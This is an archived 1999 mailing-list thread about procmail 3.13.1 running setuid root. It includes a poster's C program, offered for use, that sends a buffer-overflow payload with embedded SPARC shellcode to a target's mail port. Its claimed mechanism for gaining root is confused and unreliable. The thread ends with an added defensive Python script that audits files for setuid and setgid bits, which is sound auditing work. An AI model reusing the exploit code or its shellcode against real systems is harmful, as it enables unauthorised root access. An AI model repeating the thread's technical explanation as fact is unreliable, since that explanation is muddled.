procmail

Security Problem? Overflow Procmail v3.13.1

1999-11-19 13:23:02
I got this from a former admin at Goodnet.com.  I must point out that
Goodnet has since re-installed Procmail v3.10.

Felix Tilley
Tucson, Arizona

Felix Tilley <ftilley(_at_)goodnet(_dot_)com> wrote:

In article 
<ftilley-ya02408000R0411990742430001(_at_)news(_dot_)goodnet(_dot_)com>, Felix
Tilley <ftilley(_at_)goodnet(_dot_)com> wrote:

It appears Goodnet has removed Procmail sometime in the last 3 days.  I
hope they are doing some VERY good mail filtering to get rid of the spam.
I used to get 2 to 8 spams per day.  Procmail got rid of almost all of it.


Well, it now appears that Goodnet has upgraded from Procmail version 3.10 to
3.13.1.  I am not sure what the difference is.  They installed it
midmorning on Thursday.


cd /bin
ls -l|grep -i proc
-rwsr-sr-x   1 root     mail       78656 Nov  4 10:28 procmail


What does that "s" mean?  Sticky bit?  What does that do?  Does that mean
it is always in memory, or that it isn't eligible for swap-space?

The -'s are split up into three groups. Read Write and Execute for
owner, group, and other (everyone).   The 's' in the case means that
it is SETUID -- The first S; and the second s means SETGID.

What that means to you is that when / if you can run it (which you can
since the last set of three are read and execute) it will run not as
you, but at the person/group that owns this file.  In other words when
you type ./procmail it is running as 'root' & group 'mail' instead of
the normal 'ftilley' - 'users'.

Now that you know that, you can also note this.  Procmail
has a nice little feature that allows you to 'BUFFER OVERFLOW' it and
get root access.  This works by sending huge, weird amounts of garbage
to procmail and then having procmail dump core...   When procmail
does this it does not 'switch' permissions back to the user who ran
it, therefore you are now root.

FYI:  I take the 5th!    :)

-- Shawn

P.S.  Here is the code to overflow procmail.


/*
 *  Overflow for procmail 3.13.1
 *
 */

#include <stdio.h>
#include <stdlib.h>     /* atoi, exit */
#include <string.h>     /* strcat */

int main(int argc, char **argv)
{
    long unsigned int large_string[10000];
    int i, prelude;
    unsigned long offset;
    char padding[50] = "";                  /* must start empty for strcat */

    if (argc < 3)                           /* both arguments are read below */
    {
        printf("Usage: %s  bufsize <alignment offset> | nc target 25\n",
            argv[0]);
        exit(1);
    }

    offset  = 188;                          /* Magic numbers (unused here) */
    prelude = atoi(argv[1]);

    for (i = 6; i < (6 + atoi(argv[2])); i++)
    {
        strcat(padding, "A");
    }
    for(i = 0; i < prelude; i++)
    {
        large_string[i] = 0xfffffff0;       /* Illegal instruction */
    }

    large_string[prelude] = 0xf7ffef50;     /* Arbitrary overwrite of %fp */

    large_string[prelude + 1] = 0xf7fff00c; /* Works for me; address of code */

    for( i = (prelude + 2); i < (prelude + 64); i++)
    {
        large_string[i] = 0xa61cc013;       /* Lots of sparc NOP's */
    }


        large_string[prelude + 64] = 0x250bcbc8;
        large_string[prelude + 65] = 0xa414af75;
        large_string[prelude + 66] = 0x271cdc88;
        large_string[prelude + 67] = 0xa614ef65;
        large_string[prelude + 68] = 0x291d18c8;
        large_string[prelude + 69] = 0xa8152f72;
        large_string[prelude + 70] = 0x2b1c18c8;
        large_string[prelude + 71] = 0xaa156e72;
        large_string[prelude + 72] = 0x2d195e19;
        large_string[prelude + 73] = 0x900b800e;
        large_string[prelude + 74] = 0x9203a014;
        large_string[prelude + 75] = 0x941ac00b;
        large_string[prelude + 76] = 0x9c03a104;
        large_string[prelude + 77] = 0xe43bbefc;
        large_string[prelude + 78] = 0xe83bbf04;
        large_string[prelude + 79] = 0xec23bf0c;
        large_string[prelude + 80] = 0xdc23bf10;
        large_string[prelude + 81] = 0xc023bf14;
        large_string[prelude + 82] = 0x8210203b;
        large_string[prelude + 83] = 0xaa103fff;
        large_string[prelude + 84] = 0x91d56001;
        large_string[prelude + 85] = 0xa61cc013;
        large_string[prelude + 86] = 0xa61cc013;
        large_string[prelude + 87] = 0xa61cc013;
        large_string[prelude + 88] = 0;

                        /* And finally, the overflow..simple, huh? :) */
    printf("helo\n");
    printf("mail from: %s%s\n", padding, large_string);
    return 0;
}


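Shawn's explanation of the 's' bits is the part of this thread a defender acts on: a world-executable binary that is setuid root and setgid mail is a privilege boundary, and the first mitigation step is knowing which files on a host carry those bits. The following Python is an added example written for this page, not code from the thread or from the procmail project. It decodes `ls -l` mode strings like the one Felix pasted, reports which user and group each setuid/setgid file would run as, and can also walk a real directory with os.stat. Only the procmail line of the sample listing is from the post; the other three lines are constructed for contrast.

```python
import os
import re
import stat

# Constructed sample listing: the procmail line is quoted from the thread, the
# other entries are made up to show a plain binary, a setuid file without the
# execute bit, and a sticky directory.
SAMPLE_LISTING = """\
-rwsr-sr-x   1 root     mail       78656 Nov  4 10:28 procmail
-rwxr-xr-x   1 root     root       12345 Jan  1 00:00 ls
-rwSr--r--   1 root     root         100 Jan  1 00:00 oddfile
drwxrwxrwt   2 root     root        4096 Jan  1 00:00 tmp
"""

# Fields of a typical `ls -l` line: mode, link count, owner, group, size, date, name.
LS_LINE = re.compile(
    r"^(?P<mode>[-dlcbps][rwxsStT-]{9})\s+\d+\s+(?P<owner>\S+)\s+(?P<group>\S+)"
    r"\s+\d+\s+\S+\s+\d+\s+\S+\s+(?P<name>.+)$"
)


def mode_string_to_bits(mode_str):
    """Convert a 10-character ls mode string such as '-rwsr-sr-x' to st_mode bits."""
    if len(mode_str) != 10:
        raise ValueError("mode string must be 10 characters: %r" % mode_str)
    bits = 0
    for i, ch in enumerate(mode_str[1:]):      # 9 permission characters
        exec_bit = 1 << (8 - i)                  # rwx positions map to 0o400 .. 0o001
        if ch == "-":
            continue
        if ch in "rwx":
            bits |= exec_bit
        elif ch in "sS" and i in (2, 5):         # user-x or group-x position
            bits |= stat.S_ISUID if i == 2 else stat.S_ISGID
            if ch == "s":                        # lowercase means execute is also set
                bits |= exec_bit
        elif ch in "tT" and i == 8:              # sticky bit lives in other-x
            bits |= stat.S_ISVTX
            if ch == "t":
                bits |= exec_bit
        else:
            raise ValueError("bad character %r at position %d" % (ch, i))
    return bits


def describe(name, bits, owner, group):
    """Return a finding dict for a file whose setuid or setgid bit is set, else None."""
    if not bits & (stat.S_ISUID | stat.S_ISGID):
        return None
    return {
        "name": name,
        "octal": format(stat.S_IMODE(bits), "o"),          # e.g. '6755'
        "runs_as_user": owner if bits & stat.S_ISUID else None,
        "runs_as_group": group if bits & stat.S_ISGID else None,
        # Anyone on the box can reach the privileged code path if other-x is set.
        "world_executable": bool(bits & stat.S_IXOTH),
    }


def audit_listing(listing):
    """Parse `ls -l` text and return findings for every setuid/setgid entry."""
    findings = []
    for line in listing.splitlines():
        m = LS_LINE.match(line)
        if not m:
            continue                              # headers, totals, unparseable lines
        bits = mode_string_to_bits(m["mode"])
        f = describe(m["name"], bits, m["owner"], m["group"])
        if f:
            findings.append(f)
    return findings


def scan_directory(path):
    """Same audit against a live directory, using st_mode and numeric uid/gid."""
    findings = []
    for entry in os.scandir(path):
        st = entry.stat(follow_symlinks=False)
        if not stat.S_ISREG(st.st_mode):
            continue
        f = describe(entry.path, st.st_mode, "uid=%d" % st.st_uid, "gid=%d" % st.st_gid)
        if f:
            findings.append(f)
    return findings


if __name__ == "__main__":
    for f in audit_listing(SAMPLE_LISTING):
        print("%-10s mode %s runs as user=%s group=%s world-exec=%s" % (
            f["name"], f["octal"], f["runs_as_user"], f["runs_as_group"],
            f["world_executable"]))
```

Running the script prints the two findings from the sample: procmail is mode 6755 and would run as root:mail for any local user, which is exactly the combination Shawn describes; oddfile has the setuid bit but no execute bit, so it is flagged for review even though it cannot currently be run. On a real host, `scan_directory("/bin")` gives the same report from os.stat, and `find / -perm /6000 -type f` is a quick cross-check with GNU find.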